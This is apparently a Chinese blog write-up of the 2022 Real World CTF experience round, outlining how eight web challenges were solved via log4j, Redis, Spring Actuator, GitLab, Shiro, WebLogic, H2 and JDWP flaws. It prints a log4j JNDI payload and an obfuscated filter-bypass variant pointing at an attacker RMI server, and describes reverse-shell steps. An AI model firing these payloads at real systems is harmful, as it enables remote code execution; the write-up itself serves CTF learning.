2022 Real World CTF体验赛Writeup

还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。

2022 Real World CTF体验赛Writeup_第1张图片

log4flag

2022 Real World CTF体验赛Writeup_第2张图片
2022 Real World CTF体验赛Writeup_第3张图片
2022 Real World CTF体验赛Writeup_第4张图片
提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp}
2022 Real World CTF体验赛Writeup_第5张图片
存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}
直接搭建jndi服务,尝试反弹shell
2022 Real World CTF体验赛Writeup_第6张图片

2022 Real World CTF体验赛Writeup_第7张图片
在这里插入图片描述
flag:rwctf{d4b4b837f95542aa93b43ee280b230d8}

Be-a-Database-Hacker

2022 Real World CTF体验赛Writeup_第8张图片
根据提示,6379反弹,很明显的redis。
获取题目地址后
测试是否存在未授权访问
2022 Real World CTF体验赛Writeup_第9张图片
很明显存在未授权访问,而且redis版本<5.0.5,这里可以使用redis主从复制进行RCE。
2022 Real World CTF体验赛Writeup_第10张图片
2022 Real World CTF体验赛Writeup_第11张图片
flag:rwctf{c4374dba71fbf50144f7a1a04b7f5837}

the Secrets of Memory

2022 Real World CTF体验赛Writeup_第12张图片
2022 Real World CTF体验赛Writeup_第13张图片
tips很明显了,Spring Boot ActuatorRCE
2022 Real World CTF体验赛Writeup_第14张图片
访问/actuator/env的时候,actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换,以达到脱敏的效果。
而这里提示,flag就是password,而这里的password,已经脱敏。2022 Real World CTF体验赛Writeup_第15张图片
在目标既不出网,/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下,很多获取被星号脱敏的密码的明文的方法就失效了。
这时候就可以利用 Eclipse Memory Analyzer 来分析 /heapdump/actuator/heapdump 接口下载的 jvm heap 信息,查找密码明文。
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
2022 Real World CTF体验赛Writeup_第16张图片
flag:rwctf{d597d5defdd22829d8587efb9f9d0954}

baby flaglab

2022 Real World CTF体验赛Writeup_第17张图片
2022 Real World CTF体验赛Writeup_第18张图片
考点是Gitlab的一个CVE:CVE-2021-22205,直接echo 写 反弹shell 到 tmp目录 然后赋予执行权限 然后执行就可以。
2022 Real World CTF体验赛Writeup_第19张图片


2022 Real World CTF体验赛Writeup_第20张图片
flag:rwctf{4edb62cb7b37d647e13bfed4f8d4b860}

Ghost shiro

2022 Real World CTF体验赛Writeup_第21张图片
这个环境现在一直起不来,很迷。
讲下解题思路吧,shiro,但不是默认key
首先通过tomcat Ghostcat(CVE-2020-1938)漏洞读取shiro.ini配置文件,得到key:ODN6dDZxNzh5ejB6YTRseg==
接着直接打shiro550漏洞即可。

Flag Console

2022 Real World CTF体验赛Writeup_第22张图片
2022 Real World CTF体验赛Writeup_第23张图片
一个weblogic的CVE-2020-14882,不多说

2022 Real World CTF体验赛Writeup_第24张图片
flag:rwctf{a4c0185ddf2a4e679bd6f1df137c12ba}

Be-a-Database-Hacker 2

2022 Real World CTF体验赛Writeup_第25张图片
2022 Real World CTF体验赛Writeup_第26张图片
H2数据库,搜索一下存在哪些洞
2022 Real World CTF体验赛Writeup_第27张图片
CVE-2021-42392直接打
2022 Real World CTF体验赛Writeup_第28张图片

2022 Real World CTF体验赛Writeup_第29张图片
flag:rwctf{6288999b40cda6a393f247ef82e137e2}

Java Remote Debugger

2022 Real World CTF体验赛Writeup_第30张图片
java debug调试,下载附件:
2022 Real World CTF体验赛Writeup_第31张图片
2022 Real World CTF体验赛Writeup_第32张图片
2022 Real World CTF体验赛Writeup_第33张图片
2022 Real World CTF体验赛Writeup_第34张图片
附件是一些java程序测试代码。
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。如果这个时候就必须开启远程调试功能了,此时就有可能被攻击者利用 RCE。
2022 Real World CTF体验赛Writeup_第35张图片

在这里插入图片描述
flag:rwctf{2c0e7100bcb45cc825ca97eccb86e568}

你可能感兴趣的:(web安全,web安全,CTF,安全)